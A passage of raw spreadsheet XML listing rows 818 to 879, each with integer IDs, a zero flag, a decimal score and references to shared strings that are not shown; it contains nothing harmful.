      </c>
      <c r="D818">
        <v>0</v>
      </c>
      <c r="E818">
        <v>0.54739999771118164</v>
      </c>
      <c r="F818" t="s">
        <v>7</v>
      </c>
      <c r="G818" t="s">
        <v>1615</v>
      </c>
      <c r="H818" t="s">
        <v>1616</v>
      </c>
    </row>
    <row r="819" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A819" s="1">
        <v>817</v>
      </c>
      <c r="B819">
        <v>3559</v>
      </c>
      <c r="C819">
        <v>3559</v>
      </c>
      <c r="D819">
        <v>0</v>
      </c>
      <c r="E819">
        <v>0.43779999017715449</v>
      </c>
      <c r="F819" t="s">
        <v>7</v>
      </c>
      <c r="G819" t="s">
        <v>1617</v>
      </c>
      <c r="H819" t="s">
        <v>1618</v>
      </c>
    </row>
    <row r="820" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A820" s="1">
        <v>818</v>
      </c>
      <c r="B820">
        <v>3695</v>
      </c>
      <c r="C820">
        <v>3695</v>
      </c>
      <c r="D820">
        <v>0</v>
      </c>
      <c r="E820">
        <v>0.48170000314712519</v>
      </c>
      <c r="F820" t="s">
        <v>7</v>
      </c>
      <c r="G820" t="s">
        <v>1619</v>
      </c>
      <c r="H820" t="s">
        <v>1620</v>
      </c>
    </row>
    <row r="821" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A821" s="1">
        <v>819</v>
      </c>
      <c r="B821">
        <v>3577</v>
      </c>
      <c r="C821">
        <v>3577</v>
      </c>
      <c r="D821">
        <v>0</v>
      </c>
      <c r="E821">
        <v>0.92409998178482056</v>
      </c>
      <c r="F821" t="s">
        <v>7</v>
      </c>
      <c r="G821" t="s">
        <v>1621</v>
      </c>
      <c r="H821" t="s">
        <v>1622</v>
      </c>
    </row>
    <row r="822" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A822" s="1">
        <v>820</v>
      </c>
      <c r="B822">
        <v>3578</v>
      </c>
      <c r="C822">
        <v>3578</v>
      </c>
      <c r="D822">
        <v>0</v>
      </c>
      <c r="E822">
        <v>0.80159997940063477</v>
      </c>
      <c r="F822" t="s">
        <v>7</v>
      </c>
      <c r="G822" t="s">
        <v>1623</v>
      </c>
      <c r="H822" t="s">
        <v>1624</v>
      </c>
    </row>
    <row r="823" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A823" s="1">
        <v>821</v>
      </c>
      <c r="B823">
        <v>3579</v>
      </c>
      <c r="C823">
        <v>3579</v>
      </c>
      <c r="D823">
        <v>0</v>
      </c>
      <c r="E823">
        <v>0.88599997758865356</v>
      </c>
      <c r="F823" t="s">
        <v>7</v>
      </c>
      <c r="G823" t="s">
        <v>1625</v>
      </c>
      <c r="H823" t="s">
        <v>1626</v>
      </c>
    </row>
    <row r="824" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A824" s="1">
        <v>822</v>
      </c>
      <c r="B824">
        <v>3580</v>
      </c>
      <c r="C824">
        <v>3580</v>
      </c>
      <c r="D824">
        <v>0</v>
      </c>
      <c r="E824">
        <v>0.66200000047683716</v>
      </c>
      <c r="F824" t="s">
        <v>7</v>
      </c>
      <c r="G824" t="s">
        <v>1627</v>
      </c>
      <c r="H824" t="s">
        <v>1628</v>
      </c>
    </row>
    <row r="825" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A825" s="1">
        <v>823</v>
      </c>
      <c r="B825">
        <v>3581</v>
      </c>
      <c r="C825">
        <v>3581</v>
      </c>
      <c r="D825">
        <v>0</v>
      </c>
      <c r="E825">
        <v>0.91939997673034668</v>
      </c>
      <c r="F825" t="s">
        <v>7</v>
      </c>
      <c r="G825" t="s">
        <v>1629</v>
      </c>
      <c r="H825" t="s">
        <v>1630</v>
      </c>
    </row>
    <row r="826" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A826" s="1">
        <v>824</v>
      </c>
      <c r="B826">
        <v>3582</v>
      </c>
      <c r="C826">
        <v>3582</v>
      </c>
      <c r="D826">
        <v>0</v>
      </c>
      <c r="E826">
        <v>0.46529999375343323</v>
      </c>
      <c r="F826" t="s">
        <v>7</v>
      </c>
      <c r="G826" t="s">
        <v>1631</v>
      </c>
      <c r="H826" t="s">
        <v>1632</v>
      </c>
    </row>
    <row r="827" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A827" s="1">
        <v>825</v>
      </c>
      <c r="B827">
        <v>3694</v>
      </c>
      <c r="C827">
        <v>3694</v>
      </c>
      <c r="D827">
        <v>0</v>
      </c>
      <c r="E827">
        <v>0.93660002946853638</v>
      </c>
      <c r="F827" t="s">
        <v>7</v>
      </c>
      <c r="G827" t="s">
        <v>1633</v>
      </c>
      <c r="H827" t="s">
        <v>1634</v>
      </c>
    </row>
    <row r="828" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A828" s="1">
        <v>826</v>
      </c>
      <c r="B828">
        <v>3576</v>
      </c>
      <c r="C828">
        <v>3576</v>
      </c>
      <c r="D828">
        <v>0</v>
      </c>
      <c r="E828">
        <v>0.53899997472763062</v>
      </c>
      <c r="F828" t="s">
        <v>7</v>
      </c>
      <c r="G828" t="s">
        <v>1635</v>
      </c>
      <c r="H828" t="s">
        <v>1636</v>
      </c>
    </row>
    <row r="829" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A829" s="1">
        <v>827</v>
      </c>
      <c r="B829">
        <v>3588</v>
      </c>
      <c r="C829">
        <v>3588</v>
      </c>
      <c r="D829">
        <v>0</v>
      </c>
      <c r="E829">
        <v>0.99870002269744873</v>
      </c>
      <c r="F829" t="s">
        <v>7</v>
      </c>
      <c r="G829" t="s">
        <v>1637</v>
      </c>
      <c r="H829" t="s">
        <v>1638</v>
      </c>
    </row>
    <row r="830" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A830" s="1">
        <v>828</v>
      </c>
      <c r="B830">
        <v>3558</v>
      </c>
      <c r="C830">
        <v>3558</v>
      </c>
      <c r="D830">
        <v>0</v>
      </c>
      <c r="E830">
        <v>0.70829999446868896</v>
      </c>
      <c r="F830" t="s">
        <v>7</v>
      </c>
      <c r="G830" t="s">
        <v>1639</v>
      </c>
      <c r="H830" t="s">
        <v>1640</v>
      </c>
    </row>
    <row r="831" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A831" s="1">
        <v>829</v>
      </c>
      <c r="B831">
        <v>3555</v>
      </c>
      <c r="C831">
        <v>3555</v>
      </c>
      <c r="D831">
        <v>0</v>
      </c>
      <c r="E831">
        <v>0.86409997940063477</v>
      </c>
      <c r="F831" t="s">
        <v>7</v>
      </c>
      <c r="G831" t="s">
        <v>1641</v>
      </c>
      <c r="H831" t="s">
        <v>1642</v>
      </c>
    </row>
    <row r="832" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A832" s="1">
        <v>830</v>
      </c>
      <c r="B832">
        <v>3508</v>
      </c>
      <c r="C832">
        <v>3508</v>
      </c>
      <c r="D832">
        <v>0</v>
      </c>
      <c r="E832">
        <v>0.76759999990463257</v>
      </c>
      <c r="F832" t="s">
        <v>7</v>
      </c>
      <c r="G832" t="s">
        <v>1643</v>
      </c>
      <c r="H832" t="s">
        <v>1644</v>
      </c>
    </row>
    <row r="833" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A833" s="1">
        <v>831</v>
      </c>
      <c r="B833">
        <v>3514</v>
      </c>
      <c r="C833">
        <v>3514</v>
      </c>
      <c r="D833">
        <v>0</v>
      </c>
      <c r="E833">
        <v>0.55830001831054688</v>
      </c>
      <c r="F833" t="s">
        <v>7</v>
      </c>
      <c r="G833" t="s">
        <v>1645</v>
      </c>
      <c r="H833" t="s">
        <v>1646</v>
      </c>
    </row>
    <row r="834" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A834" s="1">
        <v>832</v>
      </c>
      <c r="B834">
        <v>3515</v>
      </c>
      <c r="C834">
        <v>3515</v>
      </c>
      <c r="D834">
        <v>0</v>
      </c>
      <c r="E834">
        <v>0.87730002403259277</v>
      </c>
      <c r="F834" t="s">
        <v>7</v>
      </c>
      <c r="G834" t="s">
        <v>1647</v>
      </c>
      <c r="H834" t="s">
        <v>1648</v>
      </c>
    </row>
    <row r="835" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A835" s="1">
        <v>833</v>
      </c>
      <c r="B835">
        <v>3516</v>
      </c>
      <c r="C835">
        <v>3516</v>
      </c>
      <c r="D835">
        <v>0</v>
      </c>
      <c r="E835">
        <v>0.99809998273849487</v>
      </c>
      <c r="F835" t="s">
        <v>7</v>
      </c>
      <c r="G835" t="s">
        <v>1649</v>
      </c>
      <c r="H835" t="s">
        <v>1650</v>
      </c>
    </row>
    <row r="836" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A836" s="1">
        <v>834</v>
      </c>
      <c r="B836">
        <v>3517</v>
      </c>
      <c r="C836">
        <v>3517</v>
      </c>
      <c r="D836">
        <v>0</v>
      </c>
      <c r="E836">
        <v>0.99839997291564941</v>
      </c>
      <c r="F836" t="s">
        <v>7</v>
      </c>
      <c r="G836" t="s">
        <v>1651</v>
      </c>
      <c r="H836" t="s">
        <v>1652</v>
      </c>
    </row>
    <row r="837" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A837" s="1">
        <v>835</v>
      </c>
      <c r="B837">
        <v>3520</v>
      </c>
      <c r="C837">
        <v>3520</v>
      </c>
      <c r="D837">
        <v>0</v>
      </c>
      <c r="E837">
        <v>0.41029998660087591</v>
      </c>
      <c r="F837" t="s">
        <v>7</v>
      </c>
      <c r="G837" t="s">
        <v>1653</v>
      </c>
      <c r="H837" t="s">
        <v>1654</v>
      </c>
    </row>
    <row r="838" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A838" s="1">
        <v>836</v>
      </c>
      <c r="B838">
        <v>3718</v>
      </c>
      <c r="C838">
        <v>3718</v>
      </c>
      <c r="D838">
        <v>0</v>
      </c>
      <c r="E838">
        <v>0.4447999894618988</v>
      </c>
      <c r="F838" t="s">
        <v>7</v>
      </c>
      <c r="G838" t="s">
        <v>1655</v>
      </c>
      <c r="H838" t="s">
        <v>1656</v>
      </c>
    </row>
    <row r="839" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A839" s="1">
        <v>837</v>
      </c>
      <c r="B839">
        <v>6408</v>
      </c>
      <c r="C839">
        <v>6408</v>
      </c>
      <c r="D839">
        <v>0</v>
      </c>
      <c r="E839">
        <v>0.99830001592636108</v>
      </c>
      <c r="F839" t="s">
        <v>7</v>
      </c>
      <c r="G839" t="s">
        <v>1657</v>
      </c>
      <c r="H839" t="s">
        <v>1658</v>
      </c>
    </row>
    <row r="840" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A840" s="1">
        <v>838</v>
      </c>
      <c r="B840">
        <v>6342</v>
      </c>
      <c r="C840">
        <v>6342</v>
      </c>
      <c r="D840">
        <v>0</v>
      </c>
      <c r="E840">
        <v>0.46119999885559082</v>
      </c>
      <c r="F840" t="s">
        <v>7</v>
      </c>
      <c r="G840" t="s">
        <v>1659</v>
      </c>
      <c r="H840" t="s">
        <v>1660</v>
      </c>
    </row>
    <row r="841" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A841" s="1">
        <v>839</v>
      </c>
      <c r="B841">
        <v>3536</v>
      </c>
      <c r="C841">
        <v>3536</v>
      </c>
      <c r="D841">
        <v>0</v>
      </c>
      <c r="E841">
        <v>0.76480001211166382</v>
      </c>
      <c r="F841" t="s">
        <v>7</v>
      </c>
      <c r="G841" t="s">
        <v>1661</v>
      </c>
      <c r="H841" t="s">
        <v>1662</v>
      </c>
    </row>
    <row r="842" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A842" s="1">
        <v>840</v>
      </c>
      <c r="B842">
        <v>3539</v>
      </c>
      <c r="C842">
        <v>3539</v>
      </c>
      <c r="D842">
        <v>0</v>
      </c>
      <c r="E842">
        <v>0.99699997901916504</v>
      </c>
      <c r="F842" t="s">
        <v>7</v>
      </c>
      <c r="G842" t="s">
        <v>1663</v>
      </c>
      <c r="H842" t="s">
        <v>1664</v>
      </c>
    </row>
    <row r="843" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A843" s="1">
        <v>841</v>
      </c>
      <c r="B843">
        <v>3543</v>
      </c>
      <c r="C843">
        <v>3543</v>
      </c>
      <c r="D843">
        <v>0</v>
      </c>
      <c r="E843">
        <v>0.55989998579025269</v>
      </c>
      <c r="F843" t="s">
        <v>7</v>
      </c>
      <c r="G843" t="s">
        <v>1665</v>
      </c>
      <c r="H843" t="s">
        <v>1666</v>
      </c>
    </row>
    <row r="844" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A844" s="1">
        <v>842</v>
      </c>
      <c r="B844">
        <v>3545</v>
      </c>
      <c r="C844">
        <v>3545</v>
      </c>
      <c r="D844">
        <v>0</v>
      </c>
      <c r="E844">
        <v>0.58600002527236938</v>
      </c>
      <c r="F844" t="s">
        <v>7</v>
      </c>
      <c r="G844" t="s">
        <v>1667</v>
      </c>
      <c r="H844" t="s">
        <v>1668</v>
      </c>
    </row>
    <row r="845" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A845" s="1">
        <v>843</v>
      </c>
      <c r="B845">
        <v>3546</v>
      </c>
      <c r="C845">
        <v>3546</v>
      </c>
      <c r="D845">
        <v>0</v>
      </c>
      <c r="E845">
        <v>0.98540002107620239</v>
      </c>
      <c r="F845" t="s">
        <v>7</v>
      </c>
      <c r="G845" t="s">
        <v>1669</v>
      </c>
      <c r="H845" t="s">
        <v>1670</v>
      </c>
    </row>
    <row r="846" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A846" s="1">
        <v>844</v>
      </c>
      <c r="B846">
        <v>3549</v>
      </c>
      <c r="C846">
        <v>3549</v>
      </c>
      <c r="D846">
        <v>0</v>
      </c>
      <c r="E846">
        <v>0.89810001850128174</v>
      </c>
      <c r="F846" t="s">
        <v>7</v>
      </c>
      <c r="G846" t="s">
        <v>1671</v>
      </c>
      <c r="H846" t="s">
        <v>1672</v>
      </c>
    </row>
    <row r="847" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A847" s="1">
        <v>845</v>
      </c>
      <c r="B847">
        <v>3553</v>
      </c>
      <c r="C847">
        <v>3553</v>
      </c>
      <c r="D847">
        <v>0</v>
      </c>
      <c r="E847">
        <v>0.9976000189781189</v>
      </c>
      <c r="F847" t="s">
        <v>7</v>
      </c>
      <c r="G847" t="s">
        <v>1673</v>
      </c>
      <c r="H847" t="s">
        <v>1674</v>
      </c>
    </row>
    <row r="848" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A848" s="1">
        <v>846</v>
      </c>
      <c r="B848">
        <v>3714</v>
      </c>
      <c r="C848">
        <v>3714</v>
      </c>
      <c r="D848">
        <v>0</v>
      </c>
      <c r="E848">
        <v>0.62569999694824219</v>
      </c>
      <c r="F848" t="s">
        <v>7</v>
      </c>
      <c r="G848" t="s">
        <v>1675</v>
      </c>
      <c r="H848" t="s">
        <v>1676</v>
      </c>
    </row>
    <row r="849" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A849" s="1">
        <v>847</v>
      </c>
      <c r="B849">
        <v>3589</v>
      </c>
      <c r="C849">
        <v>3589</v>
      </c>
      <c r="D849">
        <v>0</v>
      </c>
      <c r="E849">
        <v>0.99910002946853638</v>
      </c>
      <c r="F849" t="s">
        <v>7</v>
      </c>
      <c r="G849" t="s">
        <v>1677</v>
      </c>
      <c r="H849" t="s">
        <v>1678</v>
      </c>
    </row>
    <row r="850" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A850" s="1">
        <v>848</v>
      </c>
      <c r="B850">
        <v>3591</v>
      </c>
      <c r="C850">
        <v>3591</v>
      </c>
      <c r="D850">
        <v>0</v>
      </c>
      <c r="E850">
        <v>0.77219998836517334</v>
      </c>
      <c r="F850" t="s">
        <v>7</v>
      </c>
      <c r="G850" t="s">
        <v>1679</v>
      </c>
      <c r="H850" t="s">
        <v>1680</v>
      </c>
    </row>
    <row r="851" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A851" s="1">
        <v>849</v>
      </c>
      <c r="B851">
        <v>3691</v>
      </c>
      <c r="C851">
        <v>3691</v>
      </c>
      <c r="D851">
        <v>0</v>
      </c>
      <c r="E851">
        <v>0.54369997978210449</v>
      </c>
      <c r="F851" t="s">
        <v>7</v>
      </c>
      <c r="G851" t="s">
        <v>1681</v>
      </c>
      <c r="H851" t="s">
        <v>1682</v>
      </c>
    </row>
    <row r="852" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A852" s="1">
        <v>850</v>
      </c>
      <c r="B852">
        <v>6385</v>
      </c>
      <c r="C852">
        <v>6385</v>
      </c>
      <c r="D852">
        <v>0</v>
      </c>
      <c r="E852">
        <v>0.73309999704360962</v>
      </c>
      <c r="F852" t="s">
        <v>7</v>
      </c>
      <c r="G852" t="s">
        <v>1683</v>
      </c>
      <c r="H852" t="s">
        <v>1684</v>
      </c>
    </row>
    <row r="853" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A853" s="1">
        <v>851</v>
      </c>
      <c r="B853">
        <v>3631</v>
      </c>
      <c r="C853">
        <v>3631</v>
      </c>
      <c r="D853">
        <v>0</v>
      </c>
      <c r="E853">
        <v>0.98900002241134644</v>
      </c>
      <c r="F853" t="s">
        <v>7</v>
      </c>
      <c r="G853" t="s">
        <v>1685</v>
      </c>
      <c r="H853" t="s">
        <v>1686</v>
      </c>
    </row>
    <row r="854" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A854" s="1">
        <v>852</v>
      </c>
      <c r="B854">
        <v>3633</v>
      </c>
      <c r="C854">
        <v>3633</v>
      </c>
      <c r="D854">
        <v>0</v>
      </c>
      <c r="E854">
        <v>0.97710001468658447</v>
      </c>
      <c r="F854" t="s">
        <v>7</v>
      </c>
      <c r="G854" t="s">
        <v>1687</v>
      </c>
      <c r="H854" t="s">
        <v>1688</v>
      </c>
    </row>
    <row r="855" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A855" s="1">
        <v>853</v>
      </c>
      <c r="B855">
        <v>3669</v>
      </c>
      <c r="C855">
        <v>3669</v>
      </c>
      <c r="D855">
        <v>0</v>
      </c>
      <c r="E855">
        <v>0.5745999813079834</v>
      </c>
      <c r="F855" t="s">
        <v>7</v>
      </c>
      <c r="G855" t="s">
        <v>1689</v>
      </c>
      <c r="H855" t="s">
        <v>1690</v>
      </c>
    </row>
    <row r="856" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A856" s="1">
        <v>854</v>
      </c>
      <c r="B856">
        <v>3639</v>
      </c>
      <c r="C856">
        <v>3639</v>
      </c>
      <c r="D856">
        <v>0</v>
      </c>
      <c r="E856">
        <v>0.65219998359680176</v>
      </c>
      <c r="F856" t="s">
        <v>7</v>
      </c>
      <c r="G856" t="s">
        <v>1691</v>
      </c>
      <c r="H856" t="s">
        <v>1692</v>
      </c>
    </row>
    <row r="857" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A857" s="1">
        <v>855</v>
      </c>
      <c r="B857">
        <v>6374</v>
      </c>
      <c r="C857">
        <v>6374</v>
      </c>
      <c r="D857">
        <v>0</v>
      </c>
      <c r="E857">
        <v>0.91519999504089355</v>
      </c>
      <c r="F857" t="s">
        <v>7</v>
      </c>
      <c r="G857" t="s">
        <v>1693</v>
      </c>
      <c r="H857" t="s">
        <v>1694</v>
      </c>
    </row>
    <row r="858" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A858" s="1">
        <v>856</v>
      </c>
      <c r="B858">
        <v>3644</v>
      </c>
      <c r="C858">
        <v>3644</v>
      </c>
      <c r="D858">
        <v>0</v>
      </c>
      <c r="E858">
        <v>0.82200002670288086</v>
      </c>
      <c r="F858" t="s">
        <v>7</v>
      </c>
      <c r="G858" t="s">
        <v>1695</v>
      </c>
      <c r="H858" t="s">
        <v>1696</v>
      </c>
    </row>
    <row r="859" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A859" s="1">
        <v>857</v>
      </c>
      <c r="B859">
        <v>3674</v>
      </c>
      <c r="C859">
        <v>3674</v>
      </c>
      <c r="D859">
        <v>0</v>
      </c>
      <c r="E859">
        <v>0.89240002632141113</v>
      </c>
      <c r="F859" t="s">
        <v>7</v>
      </c>
      <c r="G859" t="s">
        <v>1697</v>
      </c>
      <c r="H859" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="860" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A860" s="1">
        <v>858</v>
      </c>
      <c r="B860">
        <v>3665</v>
      </c>
      <c r="C860">
        <v>3665</v>
      </c>
      <c r="D860">
        <v>0</v>
      </c>
      <c r="E860">
        <v>0.99870002269744873</v>
      </c>
      <c r="F860" t="s">
        <v>7</v>
      </c>
      <c r="G860" t="s">
        <v>1699</v>
      </c>
      <c r="H860" t="s">
        <v>1700</v>
      </c>
    </row>
    <row r="861" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A861" s="1">
        <v>859</v>
      </c>
      <c r="B861">
        <v>3647</v>
      </c>
      <c r="C861">
        <v>3647</v>
      </c>
      <c r="D861">
        <v>0</v>
      </c>
      <c r="E861">
        <v>0.89289999008178711</v>
      </c>
      <c r="F861" t="s">
        <v>7</v>
      </c>
      <c r="G861" t="s">
        <v>1701</v>
      </c>
      <c r="H861" t="s">
        <v>1702</v>
      </c>
    </row>
    <row r="862" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A862" s="1">
        <v>860</v>
      </c>
      <c r="B862">
        <v>3649</v>
      </c>
      <c r="C862">
        <v>3649</v>
      </c>
      <c r="D862">
        <v>0</v>
      </c>
      <c r="E862">
        <v>0.93639999628067017</v>
      </c>
      <c r="F862" t="s">
        <v>7</v>
      </c>
      <c r="G862" t="s">
        <v>1703</v>
      </c>
      <c r="H862" t="s">
        <v>1704</v>
      </c>
    </row>
    <row r="863" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A863" s="1">
        <v>861</v>
      </c>
      <c r="B863">
        <v>6371</v>
      </c>
      <c r="C863">
        <v>6371</v>
      </c>
      <c r="D863">
        <v>0</v>
      </c>
      <c r="E863">
        <v>0.82209998369216919</v>
      </c>
      <c r="F863" t="s">
        <v>7</v>
      </c>
      <c r="G863" t="s">
        <v>1705</v>
      </c>
      <c r="H863" t="s">
        <v>1706</v>
      </c>
    </row>
    <row r="864" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A864" s="1">
        <v>862</v>
      </c>
      <c r="B864">
        <v>6363</v>
      </c>
      <c r="C864">
        <v>6363</v>
      </c>
      <c r="D864">
        <v>0</v>
      </c>
      <c r="E864">
        <v>0.52289998531341553</v>
      </c>
      <c r="F864" t="s">
        <v>7</v>
      </c>
      <c r="G864" t="s">
        <v>1707</v>
      </c>
      <c r="H864" t="s">
        <v>1708</v>
      </c>
    </row>
    <row r="865" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A865" s="1">
        <v>863</v>
      </c>
      <c r="B865">
        <v>6364</v>
      </c>
      <c r="C865">
        <v>6364</v>
      </c>
      <c r="D865">
        <v>0</v>
      </c>
      <c r="E865">
        <v>0.57630002498626709</v>
      </c>
      <c r="F865" t="s">
        <v>7</v>
      </c>
      <c r="G865" t="s">
        <v>1709</v>
      </c>
      <c r="H865" t="s">
        <v>1710</v>
      </c>
    </row>
    <row r="866" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A866" s="1">
        <v>864</v>
      </c>
      <c r="B866">
        <v>6369</v>
      </c>
      <c r="C866">
        <v>6369</v>
      </c>
      <c r="D866">
        <v>0</v>
      </c>
      <c r="E866">
        <v>0.59240001440048218</v>
      </c>
      <c r="F866" t="s">
        <v>7</v>
      </c>
      <c r="G866" t="s">
        <v>1711</v>
      </c>
      <c r="H866" t="s">
        <v>1712</v>
      </c>
    </row>
    <row r="867" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A867" s="1">
        <v>865</v>
      </c>
      <c r="B867">
        <v>6368</v>
      </c>
      <c r="C867">
        <v>6368</v>
      </c>
      <c r="D867">
        <v>0</v>
      </c>
      <c r="E867">
        <v>0.94870001077651978</v>
      </c>
      <c r="F867" t="s">
        <v>7</v>
      </c>
      <c r="G867" t="s">
        <v>1713</v>
      </c>
      <c r="H867" t="s">
        <v>1714</v>
      </c>
    </row>
    <row r="868" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A868" s="1">
        <v>866</v>
      </c>
      <c r="B868">
        <v>3646</v>
      </c>
      <c r="C868">
        <v>3646</v>
      </c>
      <c r="D868">
        <v>0</v>
      </c>
      <c r="E868">
        <v>0.5997999906539917</v>
      </c>
      <c r="F868" t="s">
        <v>7</v>
      </c>
      <c r="G868" t="s">
        <v>1715</v>
      </c>
      <c r="H868" t="s">
        <v>1716</v>
      </c>
    </row>
    <row r="869" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A869" s="1">
        <v>867</v>
      </c>
      <c r="B869">
        <v>3675</v>
      </c>
      <c r="C869">
        <v>3675</v>
      </c>
      <c r="D869">
        <v>0</v>
      </c>
      <c r="E869">
        <v>0.69830000400543213</v>
      </c>
      <c r="F869" t="s">
        <v>7</v>
      </c>
      <c r="G869" t="s">
        <v>1717</v>
      </c>
      <c r="H869" t="s">
        <v>1718</v>
      </c>
    </row>
    <row r="870" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A870" s="1">
        <v>868</v>
      </c>
      <c r="B870">
        <v>3624</v>
      </c>
      <c r="C870">
        <v>3624</v>
      </c>
      <c r="D870">
        <v>0</v>
      </c>
      <c r="E870">
        <v>0.61809998750686646</v>
      </c>
      <c r="F870" t="s">
        <v>7</v>
      </c>
      <c r="G870" t="s">
        <v>1719</v>
      </c>
      <c r="H870" t="s">
        <v>1720</v>
      </c>
    </row>
    <row r="871" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A871" s="1">
        <v>869</v>
      </c>
      <c r="B871">
        <v>6387</v>
      </c>
      <c r="C871">
        <v>6387</v>
      </c>
      <c r="D871">
        <v>0</v>
      </c>
      <c r="E871">
        <v>0.99119997024536133</v>
      </c>
      <c r="F871" t="s">
        <v>7</v>
      </c>
      <c r="G871" t="s">
        <v>1721</v>
      </c>
      <c r="H871" t="s">
        <v>1722</v>
      </c>
    </row>
    <row r="872" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A872" s="1">
        <v>870</v>
      </c>
      <c r="B872">
        <v>3595</v>
      </c>
      <c r="C872">
        <v>3595</v>
      </c>
      <c r="D872">
        <v>0</v>
      </c>
      <c r="E872">
        <v>0.50370001792907715</v>
      </c>
      <c r="F872" t="s">
        <v>7</v>
      </c>
      <c r="G872" t="s">
        <v>1723</v>
      </c>
      <c r="H872" t="s">
        <v>1724</v>
      </c>
    </row>
    <row r="873" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A873" s="1">
        <v>871</v>
      </c>
      <c r="B873">
        <v>3688</v>
      </c>
      <c r="C873">
        <v>3688</v>
      </c>
      <c r="D873">
        <v>0</v>
      </c>
      <c r="E873">
        <v>0.99260002374649048</v>
      </c>
      <c r="F873" t="s">
        <v>7</v>
      </c>
      <c r="G873" t="s">
        <v>1725</v>
      </c>
      <c r="H873" t="s">
        <v>1726</v>
      </c>
    </row>
    <row r="874" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A874" s="1">
        <v>872</v>
      </c>
      <c r="B874">
        <v>3686</v>
      </c>
      <c r="C874">
        <v>3686</v>
      </c>
      <c r="D874">
        <v>0</v>
      </c>
      <c r="E874">
        <v>0.82779997587203979</v>
      </c>
      <c r="F874" t="s">
        <v>7</v>
      </c>
      <c r="G874" t="s">
        <v>1727</v>
      </c>
      <c r="H874" t="s">
        <v>1728</v>
      </c>
    </row>
    <row r="875" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A875" s="1">
        <v>873</v>
      </c>
      <c r="B875">
        <v>3602</v>
      </c>
      <c r="C875">
        <v>3602</v>
      </c>
      <c r="D875">
        <v>0</v>
      </c>
      <c r="E875">
        <v>0.46840000152587891</v>
      </c>
      <c r="F875" t="s">
        <v>7</v>
      </c>
      <c r="G875" t="s">
        <v>1729</v>
      </c>
      <c r="H875" t="s">
        <v>1730</v>
      </c>
    </row>
    <row r="876" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A876" s="1">
        <v>874</v>
      </c>
      <c r="B876">
        <v>6352</v>
      </c>
      <c r="C876">
        <v>6352</v>
      </c>
      <c r="D876">
        <v>0</v>
      </c>
      <c r="E876">
        <v>0.61909997463226318</v>
      </c>
      <c r="F876" t="s">
        <v>7</v>
      </c>
      <c r="G876" t="s">
        <v>1731</v>
      </c>
      <c r="H876" t="s">
        <v>1732</v>
      </c>
    </row>
    <row r="877" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A877" s="1">
        <v>875</v>
      </c>
      <c r="B877">
        <v>3606</v>
      </c>
      <c r="C877">
        <v>3606</v>
      </c>
      <c r="D877">
        <v>0</v>
      </c>
      <c r="E877">
        <v>0.75129997730255127</v>
      </c>
      <c r="F877" t="s">
        <v>7</v>
      </c>
      <c r="G877" t="s">
        <v>1733</v>
      </c>
      <c r="H877" t="s">
        <v>1734</v>
      </c>
    </row>
    <row r="878" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A878" s="1">
        <v>876</v>
      </c>
      <c r="B878">
        <v>6391</v>
      </c>
      <c r="C878">
        <v>6391</v>
      </c>
      <c r="D878">
        <v>0</v>
      </c>
      <c r="E878">
        <v>0.55290001630783081</v>
      </c>
      <c r="F878" t="s">
        <v>7</v>
      </c>
      <c r="G878" t="s">
        <v>1735</v>
      </c>
      <c r="H878" t="s">
        <v>1736</v>
      </c>
    </row>
    <row r="879" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A879" s="1">
        <v>877</v>
      </c>
      <c r="B879">
        <v>3609</v>
      </c>
      <c r="C879">
